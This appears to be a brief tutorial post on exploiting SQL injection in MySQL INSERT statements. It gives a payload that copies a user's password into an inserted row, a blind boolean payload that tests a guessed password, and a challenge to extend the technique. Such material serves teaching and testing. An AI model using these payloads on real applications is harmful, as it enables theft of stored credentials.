Exploiting SQL Injections In Insert Statements

Exploiting SQL Injections in Insert Statement, is not trivial as most of the times you do not directly see the output of the injected query.

Unlike MS-SQL, mysql 'generally' do not support use of multiple queries which is a common trick of exploiting SQL Injections when backend database is MS-SQL.


Example 1 

Lets consider a vulnerable example, the injection point being $id (integer field) in the following statement:-

insert into secret values($id, 'Welcome');

----------------------------------------------------------- -----


insert into secret values(1000, (select passwd from users where id=1))#, 'Welcome');

'#' comments out the rest of the query.


Example 2  Blind Injection

scenario:- injection is in last column of the query and is an integer field, hence an attacker can not directly select a password in an integer field

Query:- insert into secret values('WELCOME', $id);


insert into secret values('WELCOME', (select if (passwd ='mypass',1,0) from users where id=1))#);


If 'magic_quotes' is enabled then one can use functions like ascii() and substr() to exploit it. 

Question:-  Can you exploit the above (example.2), if $id happens to be a string field. Let us know How.!!.:)